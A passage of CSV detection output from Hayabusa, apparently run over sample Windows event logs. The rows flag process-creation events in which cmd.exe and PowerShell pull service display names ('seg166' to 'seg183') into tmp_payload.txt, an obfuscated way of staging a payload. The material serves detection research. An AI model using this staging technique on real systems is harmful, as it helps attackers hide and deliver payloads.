payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:27.338 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:28.794 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:28.794 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:28.794 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:30.297 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:30.297 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:30.297 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:31.756 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:31.772 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:31.772 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:33.217 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:33.217 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:33.217 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:34.682 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:34.682 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:34.682 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:36.122 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:36.138 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:36.138 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:37.638 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:37.638 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:37.638 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:39.090 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:39.090 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:39.090 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:40.532 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xadc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:40.547 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:40.547 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:41.996 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:41.996 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:41.996 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:43.437 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:43.437 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe70 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:43.437 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:44.878 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:44.893 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:44.893 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:46.331 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:46.331 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:46.331 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:47.818 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:47.818 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:47.818 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:49.273 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:49.273 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:49.273 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:50.726 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:50.742 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:50.742 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:52.180 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:52.180 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg182"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:52.180 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:53.645 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:38:53.645 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg183"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
